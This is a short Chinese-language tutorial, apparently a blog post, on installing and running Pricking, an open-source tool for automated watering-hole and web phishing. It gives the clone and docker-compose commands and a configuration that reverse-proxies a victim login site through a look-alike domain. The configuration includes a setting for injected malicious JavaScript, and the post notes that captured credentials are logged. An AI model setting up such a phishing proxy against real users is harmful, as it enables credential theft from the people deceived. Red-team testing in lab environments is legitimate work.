视频介绍:bv1SK4y1n7xx

0x00 安装项目

Pricking 是一个自动化部署水坑和网页钓鱼的开源项目,本文介绍Pricking 项目的安装与使用。

$ git clone https://github.com/Rvn0xsy/Pricking
$ cd Pricking
$ docker-compose up -d

0x01 例子演示

环境:

假设受害服务器(172.16.42.135 )有一个站点:

2021-02-18-00-47-16

需要用户输入正确的账号密码才可以访问内部的功能。

修改docker-compose.yml:

version: '3'
services:
  nginx:
    image: rvn0xsy/pricking:v1
    ports:
     - "80:80"
    volumes:
     - ./:/tmp/pricking
     - /etc/hosts:/etc/hosts # 由于是测试,所以修改的是hosts充当DNS服务器,因此需要映射hosts文件。
    environment:
      PROXY_PASS_HOST: proxy.payloads.online
      PROXY_SOURCE_HOST: 172.16.42.135
      NGINX_LISTEN_PORT: 80
      EVIL_JS_URI: b026324c6904b2a9cb4b88d6d61c81d1

2021-02-18-00-52-45

此时访问http://proxy.payloads.online 就等同于访问受害服务器(172.16.42.135 )。

2021-02-18-00-53-45

当用户输入凭证或访问水坑网站,在Pricking项目目录中会生成access.log

2021-02-18-00-55-35